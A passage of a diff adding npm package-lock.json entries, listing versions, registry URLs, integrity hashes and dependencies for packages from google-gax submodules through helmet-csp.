"^2.6.9", + "uuid": "^9.0.1" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/google-gax/node_modules/gcp-metadata": { + "version": "6.1.0", + "resolved": "https://registry.npmjs.org/gcp-metadata/-/gcp-metadata-6.1.0.tgz", + "integrity": "sha512-Jh/AIwwgaxan+7ZUUmRLCjtchyDiqh4KjBJ5tW3plBZb5iL/BPcso8A5DlzeD9qlw0duCamnNdpFjxwaT0KyKg==", + "dependencies": { + "gaxios": "^6.0.0", + "json-bigint": "^1.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/google-gax/node_modules/google-auth-library": { + "version": "9.10.0", + "resolved": "https://registry.npmjs.org/google-auth-library/-/google-auth-library-9.10.0.tgz", + "integrity": "sha512-ol+oSa5NbcGdDqA+gZ3G3mev59OHBZksBTxY/tYwjtcp1H/scAFwJfSQU9/1RALoyZ7FslNbke8j4i3ipwlyuQ==", + "dependencies": { + "base64-js": "^1.3.0", + "ecdsa-sig-formatter": "^1.0.11", + "gaxios": "^6.1.1", + "gcp-metadata": "^6.1.0", + "gtoken": "^7.0.0", + "jws": "^4.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/google-gax/node_modules/gtoken": { + "version": "7.1.0", + "resolved": "https://registry.npmjs.org/gtoken/-/gtoken-7.1.0.tgz", + "integrity": "sha512-pCcEwRi+TKpMlxAQObHDQ56KawURgyAf6jtIY046fJ5tIv3zDe/LEIubckAO8fj6JnAxLdmWkUfNyulQ2iKdEw==", + "dependencies": { + "gaxios": "^6.0.0", + "jws": "^4.0.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/google-gax/node_modules/https-proxy-agent": { + "version": "7.0.4", + "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-7.0.4.tgz", + "integrity": "sha512-wlwpilI7YdjSkWaQ/7omYBMTliDcmCN8OLihO6I9B86g06lMyAoqgoDpV0XqoaPOKj+0DIdAvnsWfyAAhmimcg==", + "dependencies": { + "agent-base": "^7.0.2", + "debug": "4" + }, + "engines": { + "node": ">= 14" + } + }, + "node_modules/google-gax/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==" + }, + "node_modules/google-gax/node_modules/object-hash": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/object-hash/-/object-hash-3.0.0.tgz", + "integrity": "sha512-RSn9F68PjH9HqtltsSnqYC1XXoWe9Bju5+213R98cNGttag9q9yAOTzdbsqvIa7aNm5WffBZFpWYr2aWrklWAw==", + "engines": { + "node": ">= 6" + } + }, + "node_modules/google-gax/node_modules/proto3-json-serializer": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/proto3-json-serializer/-/proto3-json-serializer-2.0.2.tgz", + "integrity": "sha512-SAzp/O4Yh02jGdRc+uIrGoe87dkN/XtwxfZ4ZyafJHymd79ozp5VG5nyZ7ygqPM5+cpLDjjGnYFUkngonyDPOQ==", + "dependencies": { + "protobufjs": "^7.2.5" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/google-gax/node_modules/protobufjs": { + "version": "7.3.0", + "resolved": "https://registry.npmjs.org/protobufjs/-/protobufjs-7.3.0.tgz", + "integrity": "sha512-YWD03n3shzV9ImZRX3ccbjqLxj7NokGN0V/ESiBV5xWqrommYHYiihuIyavq03pWSGqlyvYUFmfoMKd+1rPA/g==", + "hasInstallScript": true, + "dependencies": { + "@protobufjs/aspromise": "^1.1.2", + "@protobufjs/base64": "^1.1.2", + "@protobufjs/codegen": "^2.0.4", + "@protobufjs/eventemitter": "^1.1.0", + "@protobufjs/fetch": "^1.1.0", + "@protobufjs/float": "^1.0.2", + "@protobufjs/inquire": "^1.1.0", + "@protobufjs/path": "^1.1.2", + "@protobufjs/pool": "^1.1.0", + "@protobufjs/utf8": "^1.1.0", + "@types/node": ">=13.7.0", + "long": "^5.0.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/google-gax/node_modules/retry-request": { + "version": "7.0.2", + "resolved": "https://registry.npmjs.org/retry-request/-/retry-request-7.0.2.tgz", + "integrity": "sha512-dUOvLMJ0/JJYEn8NrpOaGNE7X3vpI5XlZS/u0ANjqtcZVKnIxP7IgCFwrKTxENw29emmwug53awKtaMm4i9g5w==", + "dependencies": { + "@types/request": "^2.48.8", + "extend": "^3.0.2", + "teeny-request": "^9.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/google-gax/node_modules/teeny-request": { + "version": "9.0.0", + "resolved": "https://registry.npmjs.org/teeny-request/-/teeny-request-9.0.0.tgz", + "integrity": "sha512-resvxdc6Mgb7YEThw6G6bExlXKkv6+YbuzGg9xuXxSgxJF7Ozs+o8Y9+2R3sArdWdW8nOokoQb1yrpFB0pQK2g==", + "dependencies": { + "http-proxy-agent": "^5.0.0", + "https-proxy-agent": "^5.0.0", + "node-fetch": "^2.6.9", + "stream-events": "^1.0.5", + "uuid": "^9.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/google-gax/node_modules/teeny-request/node_modules/agent-base": { + "version": "6.0.2", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-6.0.2.tgz", + "integrity": "sha512-RZNwNclF7+MS/8bDg70amg32dyeZGZxiDuQmZxKLAlQjr3jGyLx+4Kkk58UO7D2QdgFIQCovuSuZESne6RG6XQ==", + "dependencies": { + "debug": "4" + }, + "engines": { + "node": ">= 6.0.0" + } + }, + "node_modules/google-gax/node_modules/teeny-request/node_modules/https-proxy-agent": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-5.0.1.tgz", + "integrity": "sha512-dFcAjpTQFgoLMzC2VwU+C/CbS7uRL0lWmxDITmqm7C+7F0Odmj6s9l6alZc6AELXhrnggM2CeWSXHGOdX2YtwA==", + "dependencies": { + "agent-base": "6", + "debug": "4" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/google-gax/node_modules/uuid": { + "version": "9.0.1", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-9.0.1.tgz", + "integrity": "sha512-b+1eJOlsR9K8HJpow9Ok3fiWOWSIcIzXodvv0rQjVoOVNpWMpxf1wZNpt4y9h10odCNrqnYp1OBzRktckBe3sA==", + "funding": [ + "https://github.com/sponsors/broofa", + "https://github.com/sponsors/ctavan" + ], + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/google-p12-pem": { + "version": "3.1.3", + "resolved": "https://registry.npmjs.org/google-p12-pem/-/google-p12-pem-3.1.3.tgz", + "integrity": "sha512-MC0jISvzymxePDVembypNefkAQp+DRP7dBE+zNUPaIjEspIlYg0++OrsNr248V9tPbz6iqtZ7rX1hxWA5B8qBQ==", + "dependencies": { + "node-forge": "^1.0.0" + }, + "bin": { + "gp12-pem": "build/src/bin/gp12-pem.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/google-proto-files": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/google-proto-files/-/google-proto-files-3.0.3.tgz", + "integrity": "sha512-7JaU/smPA/FpNsCaXyVjitwiQyn5zYC/ETA+xag3ziovBojIWvzevyrbVqhxgnQdgMJ0p1RVSvpzQL6hkg6yGw==", + "dependencies": { + "protobufjs": "^7.0.0", + "walkdir": "^0.4.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/googleapis": { + "version": "118.0.0", + "resolved": "https://registry.npmjs.org/googleapis/-/googleapis-118.0.0.tgz", + "integrity": "sha512-Ny6zJOGn5P/YDT6GQbJU6K0lSzEu4Yuxnsn45ZgBIeSQ1RM0FolEjUToLXquZd89DU9wUfqA5XYHPEctk1TFWg==", + "dependencies": { + "google-auth-library": "^8.0.2", + "googleapis-common": "^6.0.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/googleapis-common": { + "version": "6.0.4", + "resolved": "https://registry.npmjs.org/googleapis-common/-/googleapis-common-6.0.4.tgz", + "integrity": "sha512-m4ErxGE8unR1z0VajT6AYk3s6a9gIMM6EkDZfkPnES8joeOlEtFEJeF8IyZkb0tjPXkktUfYrE4b3Li1DNyOwA==", + "dependencies": { + "extend": "^3.0.2", + "gaxios": "^5.0.1", + "google-auth-library": "^8.0.2", + "qs": "^6.7.0", + "url-template": "^2.0.8", + "uuid": "^9.0.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/googleapis-common/node_modules/google-auth-library": { + "version": "8.8.0", + "resolved": "https://registry.npmjs.org/google-auth-library/-/google-auth-library-8.8.0.tgz", + "integrity": "sha512-0iJn7IDqObDG5Tu9Tn2WemmJ31ksEa96IyK0J0OZCpTh6CrC6FrattwKX87h3qKVuprCJpdOGKc1Xi8V0kMh8Q==", + "dependencies": { + "arrify": "^2.0.0", + "base64-js": "^1.3.0", + "ecdsa-sig-formatter": "^1.0.11", + "fast-text-encoding": "^1.0.0", + "gaxios": "^5.0.0", + "gcp-metadata": "^5.2.0", + "gtoken": "^6.1.0", + "jws": "^4.0.0", + "lru-cache": "^6.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/googleapis-common/node_modules/google-p12-pem": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/google-p12-pem/-/google-p12-pem-4.0.1.tgz", + "integrity": "sha512-WPkN4yGtz05WZ5EhtlxNDWPhC4JIic6G8ePitwUWy4l+XPVYec+a0j0Ts47PDtW59y3RwAhUd9/h9ZZ63px6RQ==", + "dependencies": { + "node-forge": "^1.3.1" + }, + "bin": { + "gp12-pem": "build/src/bin/gp12-pem.js" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/googleapis-common/node_modules/gtoken": { + "version": "6.1.2", + "resolved": "https://registry.npmjs.org/gtoken/-/gtoken-6.1.2.tgz", + "integrity": "sha512-4ccGpzz7YAr7lxrT2neugmXQ3hP9ho2gcaityLVkiUecAiwiy60Ii8gRbZeOsXV19fYaRjgBSshs8kXw+NKCPQ==", + "dependencies": { + "gaxios": "^5.0.1", + "google-p12-pem": "^4.0.0", + "jws": "^4.0.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/googleapis-common/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/googleapis-common/node_modules/uuid": { + "version": "9.0.0", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-9.0.0.tgz", + "integrity": "sha512-MXcSTerfPa4uqyzStbRoTgt5XIe3x5+42+q1sDuy3R5MDk66URdLMOZe5aPX/SQd+kuYAh0FdP/pO28IkQyTeg==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/googleapis-common/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/googleapis/node_modules/google-auth-library": { + "version": "8.8.0", + "resolved": "https://registry.npmjs.org/google-auth-library/-/google-auth-library-8.8.0.tgz", + "integrity": "sha512-0iJn7IDqObDG5Tu9Tn2WemmJ31ksEa96IyK0J0OZCpTh6CrC6FrattwKX87h3qKVuprCJpdOGKc1Xi8V0kMh8Q==", + "dependencies": { + "arrify": "^2.0.0", + "base64-js": "^1.3.0", + "ecdsa-sig-formatter": "^1.0.11", + "fast-text-encoding": "^1.0.0", + "gaxios": "^5.0.0", + "gcp-metadata": "^5.2.0", + "gtoken": "^6.1.0", + "jws": "^4.0.0", + "lru-cache": "^6.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/googleapis/node_modules/google-p12-pem": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/google-p12-pem/-/google-p12-pem-4.0.1.tgz", + "integrity": "sha512-WPkN4yGtz05WZ5EhtlxNDWPhC4JIic6G8ePitwUWy4l+XPVYec+a0j0Ts47PDtW59y3RwAhUd9/h9ZZ63px6RQ==", + "dependencies": { + "node-forge": "^1.3.1" + }, + "bin": { + "gp12-pem": "build/src/bin/gp12-pem.js" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/googleapis/node_modules/gtoken": { + "version": "6.1.2", + "resolved": "https://registry.npmjs.org/gtoken/-/gtoken-6.1.2.tgz", + "integrity": "sha512-4ccGpzz7YAr7lxrT2neugmXQ3hP9ho2gcaityLVkiUecAiwiy60Ii8gRbZeOsXV19fYaRjgBSshs8kXw+NKCPQ==", + "dependencies": { + "gaxios": "^5.0.1", + "google-p12-pem": "^4.0.0", + "jws": "^4.0.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/googleapis/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/googleapis/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/gopd": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/gopd/-/gopd-1.0.1.tgz", + "integrity": "sha512-d65bNlIadxvpb/A2abVdlqKqV563juRnZ1Wtk6s1sIR8uNsXR70xqIzVqxVf1eTqDunwT2MkczEeaezCKTZhwA==", + "dependencies": { + "get-intrinsic": "^1.1.3" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/graceful-fs": { + "version": "4.2.11", + "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", + "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==" + }, + "node_modules/graphemer": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/graphemer/-/graphemer-1.4.0.tgz", + "integrity": "sha512-EtKwoO6kxCL9WO5xipiHTZlSzBm7WLT627TqC/uVRd0HKmq8NXyebnNYxDoBi7wt8eTWrUrKXCOVaFq9x1kgag==" + }, + "node_modules/graphlib": { + "version": "2.1.8", + "resolved": "https://registry.npmjs.org/graphlib/-/graphlib-2.1.8.tgz", + "integrity": "sha512-jcLLfkpoVGmH7/InMC/1hIvOPSUh38oJtGhvrOFGzioE1DZ+0YW16RgmOJhHiuWTvGiJQ9Z1Ik43JvkRPRvE+A==", + "dependencies": { + "lodash": "^4.17.15" + } + }, + "node_modules/gtoken": { + "version": "5.3.1", + "resolved": "https://registry.npmjs.org/gtoken/-/gtoken-5.3.1.tgz", + "integrity": "sha512-yqOREjzLHcbzz1UrQoxhBtpk8KjrVhuqPE7od1K2uhyxG2BHjKZetlbLw/SPZak/QqTIQW+addS+EcjqQsZbwQ==", + "dependencies": { + "gaxios": "^4.0.0", + "google-p12-pem": "^3.0.3", + "jws": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/gtoken/node_modules/gaxios": { + "version": "4.3.2", + "resolved": "https://registry.npmjs.org/gaxios/-/gaxios-4.3.2.tgz", + "integrity": "sha512-T+ap6GM6UZ0c4E6yb1y/hy2UB6hTrqhglp3XfmU9qbLCGRYhLVV5aRPpC4EmoG8N8zOnkYCgoBz+ScvGAARY6Q==", + "dependencies": { + "abort-controller": "^3.0.0", + "extend": "^3.0.2", + "https-proxy-agent": "^5.0.0", + "is-stream": "^2.0.0", + "node-fetch": "^2.6.1" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/gulp-sort": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/gulp-sort/-/gulp-sort-2.0.0.tgz", + "integrity": "sha1-xnYqLx8N4KP8WVohWZ0/rI26Gso=", + "dev": true, + "dependencies": { + "through2": "^2.0.1" + } + }, + "node_modules/gulp-sort/node_modules/isarray": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", + "integrity": "sha1-u5NdSFgsuhaMBoNJV6VKPgcSTxE=", + "dev": true + }, + "node_modules/gulp-sort/node_modules/readable-stream": { + "version": "2.3.7", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.7.tgz", + "integrity": "sha512-Ebho8K4jIbHAxnuxi7o42OrZgF/ZTNcsZj6nRKyUmkhLFq8CHItp/fy6hQZuZmP/n3yZ9VBUbp4zz/mX8hmYPw==", + "dev": true, + "dependencies": { + "core-util-is": "~1.0.0", + "inherits": "~2.0.3", + "isarray": "~1.0.0", + "process-nextick-args": "~2.0.0", + "safe-buffer": "~5.1.1", + "string_decoder": "~1.1.1", + "util-deprecate": "~1.0.1" + } + }, + "node_modules/gulp-sort/node_modules/string_decoder": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", + "dev": true, + "dependencies": { + "safe-buffer": "~5.1.0" + } + }, + "node_modules/gulp-sort/node_modules/through2": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/through2/-/through2-2.0.5.tgz", + "integrity": "sha512-/mrRod8xqpA+IHSLyGCQ2s8SPHiCDEeQJSep1jqLYeEUClOFG2Qsh+4FU6G9VeqpZnGW/Su8LQGc4YKni5rYSQ==", + "dev": true, + "dependencies": { + "readable-stream": "~2.3.6", + "xtend": "~4.0.1" + } + }, + "node_modules/handle-thing": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/handle-thing/-/handle-thing-2.0.1.tgz", + "integrity": "sha512-9Qn4yBxelxoh2Ow62nP+Ka/kMnOXRi8BXnRaUwezLNhqelnN49xKz4F/dPP8OYLxLxq6JDtZb2i9XznUQbNPTg==", + "dev": true, + "license": "MIT" + }, + "node_modules/handlebars": { + "version": "4.7.8", + "resolved": "https://registry.npmjs.org/handlebars/-/handlebars-4.7.8.tgz", + "integrity": "sha512-vafaFqs8MZkRrSX7sFVUdo3ap/eNiLnb4IakshzvP56X5Nr1iGKAIqdX6tMlm6HcNRIkr6AxO5jFEoJzzpT8aQ==", + "dev": true, + "dependencies": { + "minimist": "^1.2.5", + "neo-async": "^2.6.2", + "source-map": "^0.6.1", + "wordwrap": "^1.0.0" + }, + "bin": { + "handlebars": "bin/handlebars" + }, + "engines": { + "node": ">=0.4.7" + }, + "optionalDependencies": { + "uglify-js": "^3.1.4" + } + }, + "node_modules/handlebars-loader": { + "version": "1.7.3", + "resolved": "https://registry.npmjs.org/handlebars-loader/-/handlebars-loader-1.7.3.tgz", + "integrity": "sha512-dDb+8D51vE3OTSE2wuGPWRAegtsEuw8Mk8hCjtRu/pNcBfN5q+M8ZG3kVJxBuOeBrVElpFStipGmaxSBTRR1mQ==", + "dev": true, + "dependencies": { + "async": "^3.2.2", + "fastparse": "^1.0.0", + "loader-utils": "1.4.x", + "object-assign": "^4.1.0" + }, + "peerDependencies": { + "handlebars": ">= 1.3.0 < 5" + } + }, + "node_modules/handlebars-loader/node_modules/big.js": { + "version": "5.2.2", + "resolved": "https://registry.npmjs.org/big.js/-/big.js-5.2.2.tgz", + "integrity": "sha512-vyL2OymJxmarO8gxMr0mhChsO9QGwhynfuu4+MHTAW6czfq9humCB7rKpUjDd9YUiDPU4mzpyupFSvOClAwbmQ==", + "dev": true, + "engines": { + "node": "*" + } + }, + "node_modules/handlebars-loader/node_modules/json5": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/json5/-/json5-1.0.2.tgz", + "integrity": "sha512-g1MWMLBiz8FKi1e4w0UyVL3w+iJceWAFBAaBnnGKOpNa5f8TLktkbre1+s6oICydWAm+HRUGTmI+//xv2hvXYA==", + "dev": true, + "dependencies": { + "minimist": "^1.2.0" + }, + "bin": { + "json5": "lib/cli.js" + } + }, + "node_modules/handlebars-loader/node_modules/loader-utils": { + "version": "1.4.2", + "resolved": "https://registry.npmjs.org/loader-utils/-/loader-utils-1.4.2.tgz", + "integrity": "sha512-I5d00Pd/jwMD2QCduo657+YM/6L3KZu++pmX9VFncxaxvHcru9jx1lBaFft+r4Mt2jK0Yhp41XlRAihzPxHNCg==", + "dev": true, + "dependencies": { + "big.js": "^5.2.2", + "emojis-list": "^3.0.0", + "json5": "^1.0.1" + }, + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/har-schema": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", + "integrity": "sha1-qUwiJOvKwEeCoNkDVSHyRzW37JI=", + "engines": { + "node": ">=4" + } + }, + "node_modules/har-validator": { + "version": "5.1.5", + "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", + "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", + "deprecated": "this library is no longer supported", + "dependencies": { + "ajv": "^6.12.3", + "har-schema": "^2.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/has": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", + "integrity": "sha512-f2dvO0VU6Oej7RkWJGrehjbzMAjFp5/VKPp5tTpWIV4JHHZK1/BxbFRtf/siA2SWTe09caDmVtYYzWEIbBS4zw==", + "dev": true, + "dependencies": { + "function-bind": "^1.1.1" + }, + "engines": { + "node": ">= 0.4.0" + } + }, + "node_modules/has-bigints": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/has-bigints/-/has-bigints-1.0.2.tgz", + "integrity": "sha512-tSvCKtBr9lkF0Ex0aQiP9N+OpV4zi2r/Nee5VkRDbaqv35RLYMzbwQfFSZZH0kR+Rd6302UJZ2p/bJCEoR3VoQ==", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/has-flag": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", + "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", + "engines": { + "node": ">=8" + } + }, + "node_modules/has-property-descriptors": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/has-property-descriptors/-/has-property-descriptors-1.0.2.tgz", + "integrity": "sha512-55JNKuIW+vq4Ke1BjOTjM2YctQIvCT7GFzHwmfZPGo5wnrgkid0YQtnAleFSqumZm4az3n2BS+erby5ipJdgrg==", + "dependencies": { + "es-define-property": "^1.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/has-proto": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/has-proto/-/has-proto-1.0.3.tgz", + "integrity": "sha512-SJ1amZAJUiZS+PhsVLf5tGydlaVB8EdFpaSO4gmiUKUOxk8qzn5AIy4ZeJUmh22znIdk/uMAUT2pl3FxzVUH+Q==", + "license": "MIT", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/has-symbols": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/has-symbols/-/has-symbols-1.0.3.tgz", + "integrity": "sha512-l3LCuF6MgDNwTDKkdYGEihYjt5pRPbEg46rtlmnSPlUbgmB8LOIrKJbYYFBSbnPaJexMKtiPO8hmeRjRz2Td+A==", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/has-tostringtag": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.2.tgz", + "integrity": "sha512-NqADB8VjPFLM2V0VvHUewwwsw0ZWBaIdgo+ieHtK3hasLz4qeCRjYcqfB6AQrBggRKppKF8L52/VqdVsO47Dlw==", + "license": "MIT", + "dependencies": { + "has-symbols": "^1.0.3" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/has-unicode": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", + "integrity": "sha1-4Ob+aijPUROIVeCG0Wkedx3iqLk=" + }, + "node_modules/has-value": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/has-value/-/has-value-1.0.0.tgz", + "integrity": "sha512-IBXk4GTsLYdQ7Rvt+GRBrFSVEkmuOUy4re0Xjd9kJSUQpnTrWR4/y9RpfexN9vkAPMFuQoeWKwqzPozRTlasGw==", + "dev": true, + "dependencies": { + "get-value": "^2.0.6", + "has-values": "^1.0.0", + "isobject": "^3.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/has-values": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/has-values/-/has-values-1.0.0.tgz", + "integrity": "sha512-ODYZC64uqzmtfGMEAX/FvZiRyWLpAC3vYnNunURUnkGVTS+mI0smVsWaPydRBsE3g+ok7h960jChO8mFcWlHaQ==", + "dev": true, + "dependencies": { + "is-number": "^3.0.0", + "kind-of": "^4.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/has-values/node_modules/is-number": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/is-number/-/is-number-3.0.0.tgz", + "integrity": "sha512-4cboCqIpliH+mAvFNegjZQ4kgKc3ZUhQVr3HvWbSh5q3WH2v82ct+T2Y1hdU5Gdtorx/cLifQjqCbL7bpznLTg==", + "dev": true, + "dependencies": { + "kind-of": "^3.0.2" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/has-values/node_modules/is-number/node_modules/kind-of": { + "version": "3.2.2", + "resolved": "https://registry.npmjs.org/kind-of/-/kind-of-3.2.2.tgz", + "integrity": "sha512-NOW9QQXMoZGg/oqnVNoNTTIFEIid1627WCffUBJEdMxYApq7mNE7CpzucIPc+ZQg25Phej7IJSmX3hO+oblOtQ==", + "dev": true, + "dependencies": { + "is-buffer": "^1.1.5" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/has-values/node_modules/kind-of": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/kind-of/-/kind-of-4.0.0.tgz", + "integrity": "sha512-24XsCxmEbRwEDbz/qz3stgin8TTzZ1ESR56OMCN0ujYg+vRutNSiOj9bHH9u85DKgXguraugV5sFuvbD4FW/hw==", + "dev": true, + "dependencies": { + "is-buffer": "^1.1.5" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/hasown": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", + "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", + "license": "MIT", + "dependencies": { + "function-bind": "^1.1.2" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/he": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/he/-/he-1.2.0.tgz", + "integrity": "sha512-F/1DnUGPopORZi0ni+CvrCgHQ5FyEAHRLSApuYWMmrbSwoN2Mn/7k+Gl38gJnR7yyDZk6WLXwiGod1JOWNDKGw==", + "dev": true, + "bin": { + "he": "bin/he" + } + }, + "node_modules/helmet": { + "version": "3.23.3", + "resolved": "https://registry.npmjs.org/helmet/-/helmet-3.23.3.tgz", + "integrity": "sha512-U3MeYdzPJQhtvqAVBPntVgAvNSOJyagwZwyKsFdyRa8TV3pOKVFljalPOCxbw5Wwf2kncGhmP0qHjyazIdNdSA==", + "dependencies": { + "depd": "2.0.0", + "dont-sniff-mimetype": "1.1.0", + "feature-policy": "0.3.0", + "helmet-crossdomain": "0.4.0", + "helmet-csp": "2.10.0", + "hide-powered-by": "1.1.0", + "hpkp": "2.0.0", + "hsts": "2.2.0", + "nocache": "2.1.0", + "referrer-policy": "1.2.0", + "x-xss-protection": "1.3.0" + }, + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/helmet-crossdomain": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/helmet-crossdomain/-/helmet-crossdomain-0.4.0.tgz", + "integrity": "sha512-AB4DTykRw3HCOxovD1nPR16hllrVImeFp5VBV9/twj66lJ2nU75DP8FPL0/Jp4jj79JhTfG+pFI2MD02kWJ+fA==", + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/helmet-csp": { + "version": "2.10.0", + "resolved": "https://registry.npmjs.org/helmet-csp/-/helmet-csp-2.10.0.tgz", + "integrity": 